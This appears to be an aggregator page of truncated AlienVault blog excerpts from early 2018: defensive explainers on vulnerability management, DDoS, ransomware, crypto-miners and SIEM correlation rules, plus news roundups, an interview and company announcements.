What's new around the internet

Last one

Source | Date (GMT) | Title | Description | Tags | Stories | Notes
AlienVault | 2018-03-14 13:00:00 GMT | Explain Vulnerability Management (direct link)

All software and hardware has vulnerabilities. So do the non-computing aspects of your organizational security, such as the physical security of your building or how susceptible your employees are to social engineering. Vulnerabilities are everywhere and in everything. The key to good security is knowing how to manage your vulnerabilities. What are they? Where are they? How can they be patched? How can they be mitigated? Which risks are you willing to take?

What is Vulnerability Management?

Vulnerability management is a continuous process of testing, reporting, response, and triage. Bruce Schneier is famous for saying, “Security is a process, not a product.” That applies very much to vulnerability management specifically, as well. You don’t just design systems, configure them, and deploy them. Every day at work you should discover and think about your vulnerabilities and consider how you’ll deal with them. Two major aspects of your security work will change constantly, whether you like it or not. One is your network and computing infrastructure. New applications will be deployed and patched. New hardware will be introduced. New people will be hired. Policies will be changed. Sometimes regulations change as well. The second constantly changing aspect is the threat landscape. At least one point of your network will be connected to the public internet, and new malware and cyber attack bots appear all the time. The way they attack and the ways they evade detection will also evolve. New malware can also be introduced to your network through removable media and bring-your-own devices (BYOD). There are also social engineering and physical (often building-related) attack vectors. All of those factors evolve and change, and that’s the main reason why vulnerability management must be a continuous process. You will also learn something new every day. If not, you’re doing something wrong.

The Vulnerability Management Process

The first phase of the vulnerability management process is asset discovery. You need to know what’s deployed on your network, which is increasingly difficult with BYOD and lines of business going off and “doing their own thing” outside of IT. You will learn about vulnerabilities in your network through sources like the CVE security management database, network vulnerability testing, vendor announcements, your logs and your SIEM, reports from your staff, and unfortunately sometimes in the wake of real cyber attacks. Do make sure you record your vulnerability discoveries in as much detail as possible, and preferably in a way that’s only accessible to the people who need to know about them. Reports should also be organized according to which aspects a vulnerability pertains to, such as an application your network uses, or a physical building vulnerability. Because vulnerabilities pertain to all the aspects and facets of your network, you should have lots of different categories. Regulations and compliance standards, as well as company policy, must also be considered. Depending on your company, industry, and jurisdiction, there may be specific standards that your vulnerability management reporting must conform to. Over time, you will inevitably discover and report a lot of vulnerabilities. A good prioritization process will help you triage your vulnerabilities so you can respond to th
AlienVault | 2018-03-13 13:00:00 GMT | Infosec Language Grows Up: The Bishop Fox Cybersecurity Style Guide (direct link)

On February 15, Bishop Fox released their Cybersecurity Style Guide. I am absolutely stoked for them, and for the arrival of what looks like a new era in InfoSec language consistency. I was lucky enough to get to speak to Technical Editor Brianne Hughes last week. “I polled the internal team,” she told me, “and got the https://willusingtheprefixcybermakemelooklikeanidiot.com/ sent back to me a few times. We need to be consistent as a department – Engineers want to know why, they want transparency, and they don’t want to be told what to do. We have lively dialog in the comments of our reports.” She went on to say, “InfoSec merges hacker slang and military jargon in a corporate setting, and it’s hard to find middle ground. The language itself is a kind of slang, and the point of slang is to identify in-groups and out-groups, so there’s definitely a border built up that we’re looking to poke holes in to facilitate future conversations.”

Those of us lucky enough to work for InfoSec companies enlightened enough to know that having editorial services available is a good thing have largely done our thing solo, and we’ve collected language that’s specific to our own company. As a new editor in that position, there’s always that little moment of hesitation, where you try to decide which style guide to leverage. Microsoft, with its monolithic 1990s tablet-down-from-the-mount style guide? Sun Microsystems, where once upon a time the collective editorial staff met to decide the proper way to write “readme,” only to decide after four straight hours of heated argument that since the users knew what we meant, we would willfully refuse to standardize? There’s the Yahoo Style Guide, the Salesforce Style Guide… everyone’s got one, and most editors have a favorite.

But this is the first time I’m aware of that someone specifically in the world of InfoSec has taken a stab at creating something like unification, by not only creating a guide, but actively promoting it, and soliciting input from across the industry. “I made this for myself because I needed it,” says Brianne. “And I was lucky enough to have the skills and the support. It’s a beautiful environment where Bishop Fox has been around 12 years, but allows for passion projects.” The second it downloaded, I sat down and read every word. You guys… this is superlative. Some highlights include:

- A technical formatting section simple enough to cover our needs, without going over the top to cover every possible contingency.
- An appendix explaining how decisions were made. This is particularly glorious, because mostly, we’re winging it. The Wild West style of InfoSec netymology has meant that most of us within our silos make a choice, and call it done. There’s been very little in the way of guidance about how to make those decisions. I think that if we, as editorial professionals, can help each other make consistent choices, the entire field will mature more rapidly, and that is all to the good for improving consistency and transparency of dialog between professionals and their clients.
- Another appendix for external resources. This is so beautifully thought-out, so comprehensive… I felt myself sighing in pure appreciation. I personally ha

Tags: Yahoo
AlienVault | 2018-03-12 13:00:00 GMT | Countering Crypto-Malware: A Guide to Preventing a Ransomware Infection (direct link)

Ransomware had what Malwarebytes describes as a "banner year" in 2017. In the 2017 State of Malware report, telemetry gathered by the anti-malware provider reveals that business and consumer ransomware detections swelled by 90 percent and 93 percent, respectively. The monthly rate of ransomware attacks against businesses grew by approximately 10 times the rate of 2016 over the same period in 2017. A 700 percent increase in ransomware helped drive that surge, with GlobeImposter and WannaCry leading the way.

(Figure: Malwarebytes 2017 State of Malware report, page 6)

Overall, Malwarebytes saw new ransomware development stagnate in the second half of 2017 as digital criminals shifted their focus to bring back old threats like banking Trojans and embrace new techniques, most notably malicious cryptocurrency miners. Those trends notwithstanding, ransomware isn't going away anytime soon. Users should therefore follow these five simple steps that can help them stay safe from a ransomware attack.

Install an Anti-Malware Solution

While some digital attackers are turning to fileless malware, many ransomware strains still come with a digital signature. Anti-malware solutions can use these imprints to detect and block a crypto-malware threat before it has time to execute on a computer. Victims of ransomware can also use these tools to clean their computers of ransomware before they restore their data using a free decryption tool or an available backup.

Update Your Systems Regularly

A common delivery vector for ransomware is an exploit kit. It's a type of software package that scans for known vulnerabilities in Adobe Flash Player and other programs. If it finds a match with its hardcoded exploits, the kit launches code that exploits the vulnerability and in turn downloads ransomware onto the vulnerable machine. By staying current with software patches, however, users can block exploit kits from activating on their computers.

(Figure: How Exploit Kits Work. Source: Barkly)

Avoid Suspicious Links and Email Attachments

As seen in the graphic above, one of the most common beginnings of an exploit kit campaign involves a phishing email recipient clicking on a malicious link that redirects them to a compromised website. Users aren't powerless against these tactics. They can make a point of not clicking suspicious links and email attachments, including those that come with messages sent to them from unfamiliar senders.

Disable Macros for Office Documents

Microsoft Office documents come with what are called macros. They are essentially rules that users can craft in order to save time by automating repetitive tasks. Unfortunately, digital attackers often hide ransomware executables within Office macros and attempt to capitalize on users' curiosity by tempting them with an unknown attachment. Users can protect themselves against this trick by disabling macros in Office, by steering clear of unsolicited attachments, and by making it a rule not to enable macros in any document should they receive a prompt to do so.

Install a Pop-Up Blocker

Bad actors don't just rely on ema

Tags: Guideline, Wannacry
AlienVault | 2018-03-09 14:00:00 GMT | Things I hearted this week 9th March 2018 (direct link)

It’s been an uneventful week for the most part. I did spend a lot of time reading tweets by Today In Infosec. If you don’t know of it, I suggest checking it out. As the name suggests, it tweets out news from the world of information security from previous years. I was thinking that maybe I could wait five years and then recycle these weekly roundup blogs as “This week in Infosec.” But that’s the future; let’s jump into the news that matters today.

An Olympic hack
What went on behind the scenes at the Olympics? How much hacking went on, who was behind it, and what can be done about it?
Lessons in Cyber: Influence Operations | Comae Technologies (the Grugq)
2018 Winter Olympic Games have been hacked, organizers confirm | Digital Trends
Russian spies hacked the Olympics and tried to make it look like North Korea did it, U.S. officials say | Washington Post

SAML, SSO many vulnerabilities
SAML-based single sign-on systems have some vulnerabilities that allow attackers with authenticated access to trick SAML systems into authenticating as different users without knowledge of the victims’ password. Sounds like a lot of fun.
Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | Duo

Passhunt
I came across this little gem on GitHub this week. Basically, it’s a repository of default credentials for a plethora of network devices, web apps, and so forth, covering over 500 vendors and nearly 2,100 default passwords. Remember, Mirai originally only had 61 default passwords to wreak havoc.
Passhunt | GitHub

Sharing is caring
If you give your information to a business, how many places do you think it shares that information with? None, a dozen, fifty? Well, thanks to GDPR compliance, PayPal has shared a list of over 600 entities it shares data with.
List of Third Parties (other than PayPal Customers) with Whom Personal Information May be Shared | PayPal

Related
What Amazon Echo and Google Home do with your voice data | Wired
MoviePass CEO admits company creepily tracks users | New York Post
AlienVault | 2018-03-08 14:00:00 GMT | Explain What DDoS Is (direct link)

Your favorite website goes offline. That firewall in your office network isn’t filtering anything and is overwhelming the server machines that it is connected to. If an LDAP port is hit by a DDoS attack, you have no Active Directory securing the user accounts on your Windows client PCs. Maybe an IMAP server was hit, so now you have to actually phone your boss because she cannot communicate with you via email. You sit in your cubicle, unable to log into your PC because LDAP was DDoS attacked. Accessing your work email on your phone is a waste of time because your employer’s email server won’t work if it’s the DDoS target instead. On top of all that, the web forums on fly fishing you usually kill time with are offline because they were hit by a DDoS attack as well! The network administrator steps out of the datacenter and announces to your office that the company’s firewalls and servers were hit by a DDoS attack. But there’s no need to worry, because she will bring everything back online within the next ten minutes. What happened?

A DDoS attack, Explained

DDoS is an acronym for Distributed Denial of Service. A simple Denial of Service could be a technical accident where something such as a memory buffer overflows and the affected device is forced to shut down because of it; however, DDoS attacks are no accident. They are deliberate, malicious cyber-attacks. The targeted network appliance or server denies usual service because it has been deliberately overwhelmed with data packets. Imagine five hundred people trying to run through a doorway at the same time. The service that the doorway usually provides by allowing people to go from one room to another will obviously no longer work. The doorway has a finite capacity, the same as a firewall and the memory buffer in your server application. DDoS attacks are conducted deliberately by cyber attackers.

The most common way that DDoS attacks are conducted these days is by leveraging control of a botnet. A botnet is a network of “bots,” usually connected through the internet. The bots are usually PCs, mobile devices, and IoT devices which have malware on them that allows a cyber attacker to use their computing power via a command-and-control server. When the attacker finds a public IP address that they want to target, they will command their bots to send as many data packets to the IP as possible. All of those packets arriving at once will overwhelm whichever device and software the IP is connected to, and it will go out of service.

Occasionally these days, but more frequently in the 1990s, a web server’s website could go offline if too many people tried to download webpages from it at the same time. Big tech companies like Google and Amazon have massive datacenters around the world which consume more electricity than some countries. They can handle millions of people trying to use their web services at the same time. But if I install Apache on an old PC on my LAN and put a website on it, it won’t have anywhere near the same capacity. Hundreds of people trying to download a webpage at the same time might overwhelm my home router and my modest PC, and it will go offline. That’s the sort of denial of service that’s an innocent accident. But DDoS attacks are no accidents. They’re also distributed, which means that many different devices are working in unison to flood an IP with packets.

Explain Types of DDoS attacks

The OSI layer model describes seven layers which constitute a networked computing entity, usually through TCP/IP.
AlienVault | 2018-03-07 14:00:00 GMT | An Interview with Graham Cluley (direct link)

I can’t remember what year I first met Graham Cluley. It may have been around 2006 at an awards event of some sort. We were both nominated in the same category; I believe it was for best security blogger. Graham was already well-established with many awards under his belt, whereas I was the jittery newbie, glad to have even been nominated for anything at all. As you may have guessed, Graham won that night. Usually I’d force a smile, congratulate the winner with some hollow words and then drown my disappointment at the buffet. But Graham is quite the quintessential gentleman. He sat and chatted with me throughout the evening, sharing tips and techniques and being overall very encouraging. I’ve kept an eye on his career ever since and stayed in touch with him. I felt like it was worth getting some time once again and talking through what makes him tick.

You’ve been in the industry for a long time, what’s the secret to staying so apparently happy and enthusiastic - not to mention retaining a full head of hair?

Life is so ghastly and absurd that it's impossible to take it too seriously. One of my failings is that I have a pitifully low boredom threshold, and find it a hard thing to disguise. This isn't a good thing, and has probably harmed my career immensely. Recently my wife says she's spotted a couple of grey hairs on my head, so it does appear that I am mortal. My brothers don't seem to have lost their hair either, so it must be something in the Cluley gene pool. That or the fact I spent the first eighteen years of my life eating only cheese sandwiches.

There were your early days at Dr. Solomon’s, the Naked Security era, and now your life as an independent expert - with a more respected brand than most companies have. Was this a planned journey? How did your career end up here?

I don't really think I have a career. I find it hard to describe to people what exactly it is that I do for a job. When I meet up with my brothers, they're baffled as to how I'm able to make a living too. So, there was no planned journey to get to this point. At college, I wrote and sold computer games, and they're what got the attention of Alan Solomon, who offered me a job as a programmer in the early days of anti-virus. I left Dr. Solomon's (which was a fun place to work) because they got acquired by McAfee (who didn't seem very fun). I joined Sophos because it was a small fun company, and then left when it became big and stopped being fun. I make decisions like these fairly impulsively. Something will switch in my head and make me say, "I'd rather do something fun", and then that's it, my mind’s made up. Life is a little different now as I have a wife and young son, and I need to remind myself that I have some responsibilities. If they weren't in my life, it's quite possible that I would be doing something other than computer security. But I do enjoy finding new things to do – and my latest obsession is the weekly podcast I co-host with Carole Theriault.

You’re a pretty public figure, but what little-known fact about your background usually surprises people?

While I was studying at university, my girlfriend joined a cult. I tried for years to get her out, without success. That was pretty horrible, but I met a lot of good people and - hopefully - helped some other people l

Tags: General Information, Uber
AlienVault | 2018-03-06 14:00:00 GMT | AlienVault USM Anywhere ISMS is Now Certified to ISO 27001:2013 (direct link)

I’m pleased to announce that AlienVault’s USM Anywhere Information Security Management System (ISMS) is certified to ISO 27001:2013 by an accredited certification body. This certification underscores our commitment to providing effective threat detection and rapid incident response capabilities in a secure cloud environment. Our certification process was led by Coalfire ISO, Inc., an ISO/IEC 27001 Certification Body accredited by the ANSI-ASQ National Accreditation Board (ANAB). The scope of this certification includes the following: the development and implementation of a rigorous security program, which includes the development and implementation of an ISMS for the AlienVault Unified Security Management® (USM) product offering, which includes USM Anywhere™ and USM Central™.

About ISO/IEC 27001:2013

The ISO/IEC 27001 family of standards defines a global standard for information security management. These standards outline the best practices and security controls required for a strong information security program, one that protects sensitive company information. The standards are comprehensive, spanning the people, processes, and IT systems involved in an organization’s security program. The sensitive information covered in ISO 27001 includes any data entrusted by third parties. For a SaaS security provider like AlienVault, this means that, in order for USM Anywhere to be compliant with ISO 27001:2013, we had to demonstrate how we secure, transmit, and store data on behalf of our customers. Having this certification gives our customers extra assurance that we are securely handling their sensitive security-related data. Like our compliance certifications for PCI DSS, SOC 2 Type 2, and an attestation of HIPAA compliance, our successful completion of a third-party audit and compliance certification for ISO 27001:2013 tells our customers that we are doing exactly what we say we are doing—that we maintain robust security controls to continually support and protect your data as well as our own.

We’ve Been Drinking Our Own Champagne Again

Last year, when AlienVault achieved compliance certifications and attestations for PCI DSS, SOC 2, and HIPAA, I described how we used the AlienVault USM Anywhere service in house to demonstrate our compliance. We did the same for our ISO 27001:2013 certification. While it’s not mandated that a security solution provider use its own product for its internal security and compliance programs, I do think it is important that you “drink your own champagne” (or, as I noted in the previous blog, “eat your own dog food”). With the USM Anywhere service offering, our compliance officer was able to readily walk auditors through many of the key security controls outlined in ISO 27001:2013. Because the platform has many out-of-the-box compliance features, including pre-built reports and custom data views, it makes it simple and fast to navigate an audit process. For customers on their own compliance path for ISO 27001:2013 certification, AlienVault USM can help to cut through the complexity and uncertainty of the audit.

How ISO 27001:2013 Sets the Stage for the GDPR

At AlienVault, we haven’t been shy about the fast-approaching deadline (May 25, 2018) for the EU General Data Protection Regulation (GDPR).
AlienVault | 2018-03-02 14:00:00 GMT | Things I Hearted this Week 2nd March 2018 (direct link)

This week London has been in the midst of snowmageddon! An inch of snow ground the city to a halt with schools closed and the capital on red alert. Fortunately, one of the perks of working from home is that I get to stay on top of the security news regardless of the weather, so put on your snow boots and jump right in.

Trading stocks in the wake of breaches
The US Securities and Exchange Commission (SEC) has warned high-ranking executives not to trade stocks before disclosing breaches, major vulnerabilities and other cybersecurity-related incidents.
SEC statement on public company cybersecurity disclosure (PDF) | SEC
After Intel & Equifax Incidents, SEC Warns Execs Not to Trade Stock While Investigating Security Incidents | Bleeping Computer

Tracking your sold hardware
Many devices now come with tracking features to help you find them if they get lost or stolen. It started predominantly with phones, but now is in most laptops, desktops, and plenty of smart devices. The trouble is that location tracking isn’t something we intuitively ask about when buying or selling an item. We just assume that the seller has disabled it, or that it wasn’t enabled in the first place. Will we get to a point where, before buying a smart teddy, a kid will ask if it’s been factory-wiped and all credentials removed?
How I sold an old Mac and unknowingly had access to its location for over 3 years | Brenden Mulligan / Medium

Cover your own assets
John Carroll wrote an interesting blog post on influencing business layers that might not get infosec.
Cover your own ass(ets) | CTU Security

Cybersecurity Style Guide
How many times have you wished you had a cybersecurity style guide to help you understand how to pronounce security phrases, how to write a word, or the definitive meaning of a term? Well, your wishes have all been answered, as Bishop Fox has created a style guide for you.
Web Semantics: The Bishop Fox Cybersecurity Style Guide | Wired
Download the Bishop Fox Cybersecurity Style Guide (PDF) | Bishop Fox

Revenge Hacking
Well, at least the motive was easy to establish.
Man admits hacking former employer’s computer system for revenge | Hackread

Teach a man to Phis

Tags: Equifax
AlienVault | 2018-03-01 14:00:00 GMT | What We Lack Most in InfoSec: Inherited Credibility (direct link)

Ask any InfoSec person the following question: What do you lack most in your job? Can you predict the answers? Of course you can. Most InfoSec folks will answer that they lack money, and resources (also known as “people”). Some of the more creative types will also mention that they lack time. These are all good answers, but they don’t answer the question. These answers indicate what most InfoSec people need, rather than what they lack. What we lack in the InfoSec community is exactly what will allow us to fulfill those needs.

I was listening to a recent Lawfare podcast. This episode featured a speech given by Chuck Rosenberg to law students at University of Virginia law school. If you are unfamiliar with Chuck Rosenberg, he served as Chief of Staff at the FBI under James Comey, as well as counselor to FBI Director Robert Mueller. Mr. Rosenberg has an impressive history. His speech was about leadership, but he mentioned something that made me consider the question “what do we lack most in InfoSec?”

Take the following scenario as an example. An attorney for the Eastern District of the United States stands before a court, ready to present a case. Once the court is called to order, the attorney introduces himself. He will customarily stand, and say: “Chuck Rosenberg, on behalf of the United States of America.” Those words have implied power. Not because it is Chuck Rosenberg saying them. There is much more to it; those words carry inherited credibility. Their power is derived from a storied institution of power.

Inherited credibility is what we lack most in InfoSec. You can be the world’s most elite hacker, capable of popping a shell faster than anyone else in town, but you will only get odd stares if you walk into the CEO’s office boasting of that credential. Most corporate cyber positions, from the security analyst all the way up to the CISO, simply do not carry any inherited credibility. This is mostly due to the newness of cybersecurity positions in most organizations. We may still be quite a distance from creating an inheritable empire. According to a February 2018 report by the Council of Economic Advisers, there is still no common lexicon for categorizing malicious cyber activities. This is especially true when discussing cybersecurity events. If we have yet to develop a common language, we are still too far off from closing the credibility gap.

We may currently lack inherited credibility, but this puts us in a unique position, as we are the trailblazers who can build that inheritance for our successors. If, however, you are working in InfoSec for your own self-aggrandizement, then you are sadly on a path to failure, but that is a broader subject. Inherited credibility is what will move us from need to surplus. (Perhaps “surplus” is a bit too optimistic, but you get the point.) The more important question you can ask yourself every day is: How can I build the credibility that will give my successors the power to continue to grow this meaningful work?

Tags: Guideline
AlienVault | 2018-02-27 14:00:00 GMT | Announcing the Winners of our Partner of the Year Awards (direct link)

The results are in, and we’re thrilled to recognize seven outstanding AlienVault partners. These companies achieved phenomenal business growth during 2017 and are the winners of our Partner of the Year awards! The AlienVault Partner Program enables leading VARs, system integrators, managed security service providers (MSSPs), managed detection & response providers (MDRs) and corporate resellers to sell and support AlienVault solutions and deliver compelling services powered by AlienVault USM in the global marketplace. With a strong focus on partner enablement, the program is designed to help partners create new opportunities for business growth, expansion and profitability. AlienVault’s dynamic and rapidly expanding partner community is a critical part of our success as a company, and we are committed to enabling and supporting the growth of our partners based on their individual goals and objectives. Our Partner of the Year awards recognize the success achieved by our partners in the following categories:

GLOBAL AWARDS:

Global Partner of the Year: SHI INTERNATIONAL INC.
Highest overall sales bookings in 2017
SHI led the AlienVault global partner community in closed deals, new customers and of course, bookings, which grew by more than 100% year-over-year. Their commitment to AlienVault is demonstrated by the large number of unique sales professionals at SHI who are responsible for identifying and booking deals with us.

Growth Partner of the Year: ABACODE
Highest growth in 2017 as compared to 2016 sales bookings
Abacode established their service offering based on AlienVault in late 2015. They did well in 2016, but 2017 was a breakout year, with the team delivering strong bookings and more than 300% growth – the largest year-over-year % increase of all our global partners.

New Partner of the Year: BLUEVOYANT
Highest sales bookings by a partner that joined our program in 2017
BlueVoyant began working with us in a limited capacity in early 2017. However, after only a few short months, they went “all in,” committing to the AlienVault USM platform to deliver services to their global customer community.

REGIONAL AWARDS:

These awards recognize partners that had the highest sales bookings in each of the 4 regions.

North American Partner of the Year: TERRA VERDE SYSTEMS
A long-standing AlienVault partner, Terra Verde has built a robust, diversified practice – reselling AlienVault USM, delivering world-class services and implementation, and leading some of the highest-rated AlienVault training classes within our partner ecosystem.

Latin American Partner of the Year:

Tags: Guideline
AlienVault | 2018-02-26 14:00:00 GMT | SIEM Content Engineer - Why Is It a “Thing”? (direct link)

If you Google “SIEM Content Engineer,” “SIEM Threat Content Engineer,” or “SIEM Content Developer,” you will see a bunch of ads, job listings and very little other content. I believe this is because the concept is new, and it appears SIEM Content Engineer is emerging as a new job title that HR departments in large companies have latched onto for a role/job that, in reality, has been around for years. For at least a decade, Anton Chuvakin of Gartner has been discussing SIEM roles and responsibilities. This new term is likely to set off even more discussion.

SIEM Content Engineer Role & Responsibilities

The SIEM Content Engineer role seems to be defined with quite a range of responsibilities, according to the job listings I reviewed. Here are some samples plucked from researching the term and checking out jobs:

- Analyzing, designing, developing and delivering solutions to stop adversaries
- Identifying threats
- Incident response
- Risk reviews
- Vulnerability management
- Event monitoring, including log management and SIEM
- Defining how logs should be parsed
- Writing new correlation rules
- Coordinating and conducting event collection, log management, event management, compliance automation, and identity monitoring activities
- Writing custom active lists, queries, and rules
- Care and content of SIEM platforms
- Developing custom content based on threat intelligence
- Ensuring SIEM technologies are integrated and utilized to protect cyber-related assets

The qualifications that were required varied quite a bit, most desiring a technical college degree and hands-on experience with SIEM. Some were quite specific, including things like knowledge of basic networking protocols and addressing schemes, e.g., TCP/IP functions, CIDR blocks, subnets, addressing, communications, etc.

Do All SIEMs Require SIEM Content Engineers?

SIEM is one of the core capabilities of AlienVault’s Unified Security Management (USM) platform. And yet, despite having worked at AlienVault for four years now, this title “SIEM Content Engineer” was totally foreign to me. I was curious about this new buzzworthy job title, so I asked my colleagues if they were familiar with it. One of my colleagues in Product Marketing who had worked for/with other SIEM vendors in the past was aware of the job title. He explained to me that even now, legacy SIEM products aren’t ready “out of the box” – they are far from a quick implementation. In order to function well, those SIEMs often require a dedicated team, or at least one person, to focus solely on writing custom correlation rules and queries. It seems as though those big, custom data analytics solutions still require quite a bit of human intelligence and effort to work properly. For example, it can be tricky for IT security practitioners to integrate emerging threat intelligence with the SIEM correlation engine, so a SIEM Content Engineer may be required. I’m going to have to brag about AlienVault a bit, as the AlienVault Labs Security Research Team handles 100 percent of that task for USM users. In addition to other research methods and sources, this team analyzes and validates the shared threat data in the
AlienVault.webp 2018-02-23 14:00:00 Things I Hearted this Week 23rd Feb 2018 (lien direct) This week seems to have flown past very quickly. We’re almost at the end of February but the security goodness (and badness depending on which side of the fence you sit) keeps rolling in at breakneck speed. I’m actually contemplating moving somewhere warm for the rest of winter. Not that it gets unbearably cold in London, but the winter does seem to drag on with grey skies and rain, and a never-ending cycle of colds, sniffles, not to mention the life-threatening “Man Flu!” But enough about me, let’s jump into the security goodness! Threat modeling Threat models are great, and poorly understood, or used by security professionals as a universal ‘get out of jail card’. “Why don’t you have 2FA on your web app?” “Oh, that’s not in our threat model.” “Why don’t you sandbox this?” “Oh, that’s not in our threat model” “Why don’t you have your threat model documented?” “Oh, that’s not in our threat model” It’s like the security equivalent to the business saying they “accepted the risk”. An interesting piece in CSO magazine takes a look at common threat model mistakes. 7 threat modeling mistakes you’re probably making | CSO What is threat modeling? | Motherboard Two Billion! Two billion (with a B), that’s the number of files apparently leaked in the US during 2017. The most common type of breach after hacking was unintended disclosure such as cloud storage misconfigurations. That means that millions of records could have been kept secure had someone brushed up on their AWS S3 Bucket security skills and not ticked the box to make it public. We’ve found the APT, the APT is us! 
Two Billion Files Leaked in US Data Breaches in 2017 | Infosecurity Magazine The US witnesses significant number of healthcare breaches in 2017 | Healthcare Global A SWIFT $6m Unknown hackers stole 339.5 million roubles ($6 million) from a Russian bank last year in an attack using the SWIFT international payments messaging system. Well, that’s a surprise. It’s not like SWIFT has been targeted ever for malicious purposes… Hackers stole $6 million from Russian bank via SWIFT system: central bank | Reuters India's City Union Bank CEO says suffered cyber hack via SWIFT system | Reuters Tesla
AlienVault.webp 2018-02-22 14:00:00 Threat Detection & Response Made Easier for Growing Financial Services Company (lien direct) For a San Francisco-based financial services firm that partners with technology entrepreneurs in the US and China, maintaining a strong security posture is critical to the company’s success. The 200 companies in the firm’s portfolio are security conscious and expect the firm to stay ahead of security threats. But this can be difficult, especially for a small team with time constraints. The firm’s Vice President of Global IT recently spoke with me about challenges his team faces. “We’re a team of three people who wear multiple hats and have about two hours each week to focus on security. It takes a lot of time to handle more than 1,000 spoofing attacks per month and respond to major vulnerabilities such as Meltdown. In addition, we have to monitor on-premises equipment at three offices as well as our cloud-based architecture, while also staying on top of employees using risky plugins and toolbars or installing sketchy software on their laptops.” To better detect a range of potential security threats, the Vice President of Global IT tested out a variety of disparate tools but found it difficult for his team to manage these. In looking for a comprehensive security monitoring solution, he considered different products including Splunk, but found these to be lacking in functionality and costly to deploy. As part of his requirements, he wanted a cloud-based offering that didn’t have data storage limits and could be integrated with disparate systems. Ultimately, he chose AlienVault USM Anywhere™, our cloud-based security monitoring platform, as the best fit for his team’s needs. In addition to the platform’s unified capabilities, the IT team leader had heard that it was easy to use and affordable; since deployment, he has been impressed with its capabilities.
“AlienVault has built out a unique product that is ideal for small companies like ours,” he explained. “No others are as comprehensive for organizations with small IT teams.” The company has been using USM Anywhere to manage threat detection since January of 2017. Designed with the needs of today’s resource-constrained IT security teams in mind, USM Anywhere significantly reduces the time and budget required for effective security monitoring and compliance management. Managed through a single pane of glass, the SaaS security monitoring platform allows the company to centralize and simplify threat detection, incident response, and compliance management across their full IT infrastructure. The platform also integrates with other IT systems and business applications such as Microsoft Office 365, Okta, and Cisco Umbrella to provide a more complete view of the company’s security posture. Another key benefit for the company is USM Anywhere’s ability to correlate server and firewall logs with data traffic between the company’s office and the cloud to identify behavioral patterns consistent with malicious activity. These event patterns are automatically prioritized and trigger an alarm to expedite investigation and response. Such proactive alerts from USM Anywhere have helped the company to keep up with threats as they develop so they can take action and block IP addresses as needed. Additionally, AlienVault’s Open Threat Exchange® (OTX™) provides threat intelligence updates related to financial services and China – two of the company’s main concerns. Using these alerts, the company proactively manages threat detection to prevent attacks from spreading Guideline
AlienVault.webp 2018-02-21 14:00:00 Crypto-Miners: What Are They and What Steps You Can Take to Protect Yourself (lien direct) Bitcoin's value grew significantly in 2017. At the beginning of the year, a single Bitcoin was worth less than $1000. By year's end, its price had grown to over $13,000. That's after peaking at $19,086.84 on 19 December. Such growth didn't go unnoticed by digital attackers or by organizations looking to supplement their online advertising revenue. Both responded by deploying crypto-miners. These tools help generate money for domain owners, yet they oftentimes have negative consequences for unsuspecting users exposed to them. To better understand the growing threat of crypto-miners, let's take a look at how crypto-mining works in general, how bad actors are abusing them to take advantage of ordinary people, and how users can protect themselves. What Are Crypto-Miners? Crypto-miners are tools that "mine," or generate, new units of a cryptocurrency like Bitcoin. They do so by completing mathematical puzzles that constitute what Hacker Noon's Chris Herd calls "proof of work calculations" for the new units. The process of mining doesn't just generate cryptocurrency; it also adds, secures, and verifies transactions to the blockchain. A deeper dive into how cryptocurrencies work is necessary to better understand crypto-miners. Digital currency like Bitcoin runs on the blockchain, a ledger of transactions which is distributed across the entire community of users who own units of that cryptocurrency. Benzinga staff writer Shanthi Rexaline explains it's here where mining comes into play: Every single transaction made and the ownership of every single cryptocurrency in circulation is recorded in the blockchain. The blockchain is run by miners, who use powerful computers that tally the transactions. 
Their function is to update each time a transaction is made and also ensure the authenticity of information, thereby ascertaining that each transaction is secure and is processed properly and safely. Every 10 minutes, mining computers collect a "block," or a few hundred pending Bitcoin transactions, and turn them into a mathematical puzzle. Those computers then use special equipment to compete against one another to solve that puzzle. Whoever completes the challenge first is eligible to receive a reward of 12.50+0.943 BTC, which is worth approximately $113,834.49 USD as of 7 February 2018. The Economist explains that the first miner to find the solution to the mathematical puzzle can announce it to the Bitcoin community. At that point, the other miners verify if the solution is correct. Assuming it is, the block is cryptographically added to the ledger, with the miners moving on to the next grouping of transactions, thereby adding to the blockchain. Source: Bitcoin 2.0 (SlideShare) How Malware Authors Are Abusing Crypto-Mining Crypto-mining isn't itself malicious in nature. But bad actors are abusing it for nefarious purposes. They're doing so by illegally accessing important business assets such as servers used for electronic medical record (EMR) systems or
AlienVault.webp 2018-02-20 14:00:00 How SIEM Correlation Rules Work (lien direct) SIEM is a powerful security tool when deployed properly. Network security appliances like IDS devices, IPS devices, and firewalls generate an awful lot of logs. A well-configured SIEM will alert security administrators to which events and trends they should pay attention to. Otherwise they’ll be too lost in event log noise to be able to effectively handle possible security threats to their network. One of the key components that a functioning SIEM requires is good and sensible SIEM correlation rules. Let’s learn how SIEM correlation rules work! It’s actually pretty simple and easy to understand. What is a correlation rule? The various appliances in your network should be constantly generating event logs that are fed into your SIEM system. A SIEM correlation rule tells your SIEM system which sequences of events could be indicative of anomalies which may suggest security weaknesses or cyber attack. When “x” and “y” or “x” and “y” plus “z” happens, your administrators should be notified. Here are some examples of SIEM correlation rules which illustrate this concept. Detect new DHCP servers in your network by watching for inside or outside connections which use UDP packets (“x”), have port 67 as the destination (“y”), and the destination IP address isn’t on the registered IP list (“z”). Warn administrators if five failed login attempts are tried with different usernames from the same IP to the same machine within fifteen minutes (“x”), if that event is followed by a successful login occurring from that same IP address to any machine inside the network (“y”). The first example could indicate a cyber attacker establishing a DHCP server to acquire malicious access to your network. Any authorized DHCP server would use one of your registered IP addresses!
The second example could indicate a cyber attacker brute-forcing an authentication vector and then successfully acquiring authentication to your network. It could be a possible privilege escalation attack. Both SIEM correlation rules could be triggered by honest mistakes and simple user errors or technical glitches. But they’re also key indicators of cyber attack and security administrators should check them out right away! SIEM correlation in a nutshell Your SIEM will analyze a whole lot of event logs which record endless seemingly mundane activities. They will look mundane to a human being if they just keep reading a list of thousands of events. Connection established from some IP address and some TCP/IP port to another IP address and TCP/IP port! Some user changed their username on Tuesday and their password on Thursday! Some client machine downloaded 500MB and uploaded 200MB of network traffic one day, then downloaded 3.5GB and uploaded 750MB of network traffic the next day! Properly designed SIEM correlation rules cut through all of the blah, blah, blah of your network event logs to detect which sequences of events are likely indications of cyber attack. So you should take great care in developing your SIEM correlation rules. SIEM is driven by computers and computers will just execute any instructions you give them. You as the clever human being with an organic brain should come up with practical SIEM correlation rules so your SIEM system can wake you up when there’s a possible cyber attack you 